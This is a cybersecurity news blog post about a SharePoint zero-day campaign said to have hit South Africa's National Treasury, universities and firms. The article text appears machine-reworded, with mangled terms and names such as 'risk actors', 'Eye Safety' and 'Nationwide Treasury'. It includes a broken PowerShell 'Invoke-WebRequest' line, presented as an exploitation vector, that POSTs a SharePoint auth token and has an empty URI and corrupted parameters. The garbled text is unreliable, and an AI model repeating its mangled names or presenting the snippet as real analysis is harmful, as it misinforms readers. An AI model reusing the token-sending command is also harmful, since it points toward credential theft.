Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Microsoft SharePoint Server 0-Day Hack Hits African Treasury, Companies, and University

Posted on July 31, 2025July 31, 2025 By CWS

A complicated cyberattack exploiting a zero-day vulnerability in Microsoft SharePoint servers has compromised over 400 entities globally, with important affect throughout African nations together with South Africa and Mauritius.

The assault particularly targets on-premise SharePoint installations, exploiting beforehand unknown safety flaws that allowed risk actors to infiltrate crucial infrastructure programs belonging to authorities businesses, instructional establishments, and personal firms.

The malware marketing campaign emerged final week when Dutch cybersecurity agency Eye Safety detected the preliminary wave of breaches.

Not like typical SharePoint vulnerabilities that have an effect on cloud-hosted situations, this zero-day particularly targets organizations working SharePoint servers on their very own infrastructure—a configuration many establishments want for enhanced management and safety.

The assault vector leverages unauthorized code execution capabilities inside SharePoint’s doc collaboration framework, enabling attackers to ascertain persistent entry to focused networks.

Enterprise Insider Africa analysts recognized the malware’s subtle conduct patterns, noting its skill to stay undetected whereas exfiltrating delicate knowledge from compromised programs.

In South Africa alone, victims span a number of sectors together with a significant automotive producer, a number of universities, native authorities entities, and the Nationwide Treasury, the place malware was found on the Infrastructure Reporting Mannequin web site.

An infection Mechanism and Technical Evaluation

The SharePoint zero-day exploits a distant code execution vulnerability within the server’s authentication mechanism, permitting attackers to bypass commonplace safety controls.

Technical evaluation reveals the malware employs a multi-stage payload supply system:-

# Instance of potential exploitation vector
Invoke-WebRequest -Uri ”
-Technique POST -Physique $sharepoint_auth_token

The assault begins with reconnaissance scans concentrating on SharePoint farms working weak variations, adopted by exploitation of the authentication bypass to inject malicious internet shells.

Microsoft has confirmed the vulnerability impacts solely on-premise installations, with cloud-hosted SharePoint On-line providers remaining safe by Microsoft’s managed safety infrastructure.

Combine ANY.RUN TI Lookup together with your SIEM or SOAR To Analyses Superior Threats -> Attempt 50 Free Trial Searches

Cyber Security News Tags:0Day, African, Companies, Hack, Hits, Microsoft, Server, SharePoint, Treasury, University

Post navigation

Previous Post: Report Links Chinese Companies to Tools Used by State-Sponsored Hackers
Next Post: What the 2025 Gartner® Magic Quadrant™ Reveals

Related Posts

New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users Cyber Security News
Malicious VS Code Extensions Attacking Windows Solidity Developers to Steal Login Credentials Cyber Security News
Predator Mobile Spyware Remains Consistent with New Design Changes to Evade Detection Cyber Security News
Trend Micro Apex One Vulnerability Allow Attackers to Inject Malicious Code Cyber Security News
Zero-Click Microsoft 365 Copilot Vulnerability Let Attackers Exfiltrates Sensitive Data Abusing Teams Cyber Security News
How Anat Heilper Orchestrates Breakthroughs In Silicon And Software Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Safely Use AI Chatbots and Assistants
  • Gen Z in the Crosshairs: Cybercriminals Shift Focus to Young, Digital-Savvy Workers
  • Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection
  • In Other News: Microsoft Probes ToolShell Leak, Port Cybersecurity, Raspberry Pi ATM Hack
  • Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Safely Use AI Chatbots and Assistants
  • Gen Z in the Crosshairs: Cybercriminals Shift Focus to Young, Digital-Savvy Workers
  • Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection
  • In Other News: Microsoft Probes ToolShell Leak, Port Cybersecurity, Raspberry Pi ATM Hack
  • Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News